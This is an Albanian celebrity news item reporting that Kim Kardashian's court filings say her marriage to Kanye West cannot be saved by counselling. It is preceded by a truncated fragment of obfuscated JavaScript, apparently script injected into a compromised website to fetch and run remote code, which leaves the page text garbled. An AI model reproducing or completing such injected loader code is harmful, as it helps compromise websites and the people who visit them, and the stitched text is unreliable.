;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kim ka ndarë mendjen, as kjo gjë nuk e shpëton dot martesën e saj me Kanye

By

Martesa e Kanye West dhe Kim Kardashian duket se është përtej shpëtimit.

Vetëm disa ditë pasi depozitoi dokumentet për t’u deklaruar ligjërisht beqare, manjatja e bukurisë ka zbuluar se asnjë përpjekje për këshillim apo pajtim nuk do të jetë në gjendje të riparojë martesën e saj me West.

“Dallime të papajtueshme kanë ekzistuar dhe vazhdojnë të ekzistojnë midis [West] dhe meje, të cilat kanë bërë që martesa jonë të prishet në mënyrë të pakthyeshme”, thotë Kardashian në dokumentet e reja gjyqësore, të siguruara nga Page Six. “Asnjë përpjekje për këshillim apo pajtim nuk do të ketë asnjë vlerë në këtë moment.”

Kardashian vazhdon duke thënë se ajo “nuk ka dëshirë të pajtohet me [West] dhe dëshiron që martesa e tyre të ndërpritet”. /Prive.al

Artikuj të ngjashëm